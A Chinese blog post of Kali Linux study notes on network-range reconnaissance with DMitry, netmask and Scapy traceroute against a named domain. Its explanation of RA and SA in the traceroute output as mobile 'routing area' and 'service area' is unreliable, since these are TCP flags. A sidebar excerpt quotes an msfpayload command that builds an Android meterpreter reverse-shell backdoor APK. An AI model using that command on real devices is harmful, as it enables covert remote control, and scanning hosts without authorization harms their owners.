kali学习-测试网络范围

最新推荐文章于 2022-07-06 12:32:46 发布
最新推荐文章于 2022-07-06 12:32:46 发布
阅读量457 收藏
点赞数 1
分类专栏: Kali学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44111753/article/details/110265500
版权

域名查询工具DMitry:查询ip或域名whois信息
在这里插入图片描述

-o输出到指定文件中
-i whois查询,后跟IPv4地址
-w whois查询,后跟字符串形式的主机名
-n 获取相关主机的netcraft.com信息,包括主机操作系统、web服务上线和运行时间信息。
-s 可能的子域名
-e 针对目标主机执行Email地址查询
-p TCP端口扫描
-f 让TCP扫描器输出过滤的端口信息
-b 让TCP扫描器输出端口banner
-t 设置端口扫描的TTL,默认是2秒

实战:dmitry -wnpb rzchina.net
在这里插入图片描述
dmitry不能判断出这个网络范围,因为一般的路由器和防火墙等并不支持IP地址范围的方式,所以工作中经常要把IP地址转换成子网掩码格式、CIDR格式和思科反向子网掩码等。在Linux中,netmask可以在各个格式件转化,使用netmask工具将域名rzchina.net转换成标准的子网掩码格式:netmask -s rzchina.net输出域名的ip地址和子网掩码
在这里插入图片描述

跟踪域名工具Scapy:一款强大的交互式数据包处理工具、数据包生成器,网络扫描器,网络发现工具和嗅探工具。它提供多种类别的交互式生成数据包或数据包集合、对数据包进行操作、发送数据包、包嗅探、应答和反馈匹配等功能。

使用sr()函数实现发送和接收数据包

ans,unans=sr(IP(dst="www.rzchina.net/30",ttl=(1,6))/TCP())

在这里插入图片描述

以表的形式查看数据包发送情况

ans.make_table(lambda(s,r):(s.dst,s.ttl,r.src))

在这里插入图片描述

使用scapy查看TCP路由跟踪信息

res,unans=traceroute(["www.google.com","www.kali.org","www.rzchina.net"],dport=[80,443],maxttl=20,retry=-2)

RA表示路由区(即当前系统中移动台当前的位置),SA表示服务区,RA(Routing Area)的标识符是RAI,RA是包含在LA内的,服务区是指移动台可获得服务的区域
在这里插入图片描述
使用res.graph()函数以图的形式显示路由跟踪结果
在这里插入图片描述
若想保存该图:res.graph(target=">tmp/graph.svg")
exit()推出scapy程序
参考书籍:Kali Linux渗透测试技术详解

行于其野
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali-linux测试网络范围
weixin_34107955的博客
04-18 291
测试网络范围内的IP地址或域名也是渗透测试的一个重要部分。通过测试网络范围内的IP地址或域名,确定是否有人入侵自己的网络中并损害系统。不少单位选择仅对局部IP基础架构进行渗透测试,但从现在的安全形势来看,只有对整个IT基础架构进行测试才有意义。这是因为在通常情况下,黑客只要在一个领域找到漏洞,就可以利用这个漏洞攻击另外一个领域。在Kali中提供了DMitry和Scapy工具。其中,DMitry...
Kali】网卡测试
zeroming的博客
05-25 1160
这里我使用虚拟机按照了Kali,使用的网卡是AWUS036NH【rlt8187】 我们启动虚拟机,现在应该可以通过其USB直通功能使用我们的无线适配器。引导VM中的Kali Linux之后,我们以root用户身份登录系统并打开终端仿真器。我们输入iwconfig命令以列出系统上所有可用的无线接口: 系统已为适配器分配了wlan0接口,但仍未激活,如从ifconfig输出中看到的: 要启动wlan0接口, 我们先执行 ifconfig wlan0 up 命令, 然后执行 ifconfig 验证它已被
3、kali配置网络
程金鹏(程利鹏)
01-13 5905
系列文章目录 1、kali简介与安装 2、kali配置apt在线安装包源为国内源 文章目录系列文章目录前言一、配置方式二、步骤1.配置临时ip1-1 配置ip1-2 配置网关1-3 解决“网络不可达” 问题1-3-1 打开配置文件1-3-2 添加命令,重启生效1-4 重新配置网关和ip2.配置永久ip总结 前言 安装完成kali系统后,我们的机器一般是可以联网的。我们可以通过ping命令来测试。但是此时一般都是默认动态分配ip的,今天我们说一下如何配置静态ip。 一、配置方式 ip的配置一般分为临时配置
kali 测试
qq_35543858的博客
01-31 284
后门生成 msfpayload -p android/meterpreter/reverse_tcp LHOST=192.168.8.104 LPORT=666 R > test.apk 加壳免杀 upx 内网穿透 注册natapp账号,并配置端口 chmod +x natapp mv /usr/local/natapp/natapp cd /uar/local/natapp/ ./n...
Kali渗透测试:对软件的溢出漏洞进行测试
Liu_Bruce的博客
05-20 736
Kali渗透测试:对软件的溢出漏洞进行测试 如何对一个软件进行渗透,渗透目标是FreeFloat FTP Server, 这是一款十分简单的FTP服务器软件。FreeFloat FTP Server会在运行的主机上建立一个FTP服务器,其他计算机上的用户可以登录这个FTP服务器来存取文件。如我们在IP地址为192.168.68.160的主机的C盘中运行FreeFloat FTP Server,在另一台计算机中可以使用FTP下载工具或者命令的方式对其进行访问。这里我们采用命令的方式对其进行访问,如下图所示:
kali-linux-network-scanning-cookbook_kali_kalilinux_
10-02
Kali Linux,原名BackTrack,是基于Debian的开源渗透测试平台,包含了各种安全和取证工具,广泛用于网络安全评估和漏洞检测。 本书的核心知识点主要包括以下几个方面: 1. **Kali Linux基础**:首先,你需要了解...
kali-linux-web-pentest-cookbook
06-24
Kali Linux Web Penetration Testing Cookbook》是一本深入探讨网络安全领域的专业书籍,专注于使用Kali Linux进行Web应用程序渗透测试的技巧和策略。Kali Linux,原名BackTrack,是一款广泛应用于安全审计和网络...
网络安全、渗透测试、安全服务面试题
最新发布
07-01
好处:(1)限制广播风暴泛洪的范围 (2)提升了网络的安全性和性能 (3)可以进行灵活的组网 如果我们忘记vlan的作用,可以试试从vlan的好处来回答。 这可以凸显你的反应力,跳出常规思维的束缚,采用一种...
网络渗透测试 CTF实践
12-02
实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举...
渗透测试指南之七个阶段
11-11
渗透测试是一种模拟黑客攻击行为,以评估网络安全防御能力...对于初学者而言,通过学习PETS框架和Kali Linux等工具,可以建立起一套标准化的渗透测试方法论。同时,持续与行业专家交流,可以不断提升自身的技能和经验。
python图像跟踪代码_Python—路由追踪(并生成追踪图片)
weixin_39758392的博客
12-04 620
需要先安装两个包[root@localhost ~]# yum install graphviz // 为了使用dot命令[root@localhost ~]# yum install ImageMagick // 为了使用/usr/bin/convert命令python脚本代码如下#!/usr/bin/evn python#-*-coding:utf-8 -...
Centos安装python3与scapy模块
悦分享
07-06 885
一、CentOS安装Python3centos7自带版本是python2.7如果要用的3.0以上的版本需要手动安装,下载地址:https://www.python.org/ftp/python/1、先查看系统python的位置在哪儿 python2.7默认安装是在 /usr/bin目录中,切换到/usr/bin/ 从下面的图中我们可以看到,python指向的是python2,python2指向的是python2.7,因此我们可以装个python3,然后删除python链接,将python3指向py
SCAPY学习笔记
xlsj雪松的博客
05-11 859
Scapy是一个可以让用户发送、侦听和解析并伪装网络报文的Python程序。这些功能可以用于制作侦测、扫描和攻击网络的工具。 1)常用的几个命令 conf:保存配置信息,修改方式,conf.verb = 2 ls():可以显示所有支持的数据包对象。例:list show、ls()、ls(TCP) lsc():列出所有函数 hide_defaults():用来删除一些用户提供的和default value相同的项目 例:>>> a=...
python之Scapy 中文文档:三、使用方法
GFS_lele的博客
03-27 2277
使用方法 译者:Larry 来源:Scapy中文使用文档 原文:Usage 协议:CC BY-NC-SA 2.5 0x01 起航Scapy Scapy的交互shell是运行在一个终端会话当中。因为需要root权限才能发送数据包,所以我们在这里使用sudo $ sudo scapy Welcome to Scapy (2.0.1-dev) >>> ...
python scapy 捕获与解析数据包的源码解析
热门推荐
抱朴守拙
07-11 1万+
scapy 是一个python编写的功能强大的网络数据包操作库,可以仿造,捕获和解析大量不同协议类型的数据包。1 scapy 安装与交互使用可参考 http://scapy.readthedocs.io/en/latest/usage.html注意事项:安装 graphviz 和 ImageMagick >>> yum install graphviz >>> pip install graphvi
python笔记系列:生成动态路由轨迹图 scapy
胡子的博客
03-26 1373
生成动态路由轨迹图 scapyscapy模板需要tcpdump程序支持,生成报表需要graphviz、ImageMagick图像处理包支持yum -y install tcpdump graphviz ImageMagick源代码安装:wget http://www.secdev.org/projects/scapy/files/scapy-2.2.0.tar.gztar -zxvf scapy-...
graph——cut 及其实现
yaonuliazzz的博客
06-11 1004
文章目录图割法原理实现过程 图割法原理 () 实现过程 from pygraph.classes.digraph import digraph from pygraph.algorithms.minmax import maximum_flow gr = digraph() gr.add_nodes([0,1,2,3]) gr.add_edge((0,1), wt=4) gr.add_edge(...
交互式数据包处理程序 Scapy 入门指南
weixin_30562507的博客
04-13 582
概述 Scapy 是一个强大的交互式数据包处理程序(使用python编写)。它能够伪造或者解码大量的网络协议数据包,能够发送、捕捉、匹配请求和回复包等等。它可以很容易地处理一些典型操作,比如端口扫描,tracerouting,探测,单元测试,攻击或网络发现(可替代hping,NMAP,arpspoof,ARP-SK,arping,tcpdump,tethereal,P0F等)...
Kali Linux 中的Nmap扫描工具
only_you1212的博客
06-09 1628
作为当今最顶尖的网络审计工具之一,Nmap 在国外已被大量的网络安全人员所使用,它的身影甚至出现在了很多的优秀影视作品中,其中影响力最大的要数经典巨著《黑客帝国》系列。在《黑客帝国2》中,Tritnity 就曾使用Nmap攻击SSH服务,从而破坏了发电厂的工作(攻击只是Nmap的副业,扫描才是Nmap的主要功能)。 目前的Nmp已经具备了主机发现功能、端口扫描功能、服务及版本检测功能、操作系统检测功能。另外除了这些基本功能之外,Nmap还可以实现些高级的审计技术, 例如伪造发起...
精通Kali Linux 高级渗透测试2023版本,英文原版
07-12
"精通Kali Linux 高级渗透测试2023版本(Mastering Kali Linux for Advanced Penetration Testing Fourth Edition)是一本由Vijay Kumar Velu编写的权威指南,它在当前数字化时代背景下,聚焦于网络安全领域。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值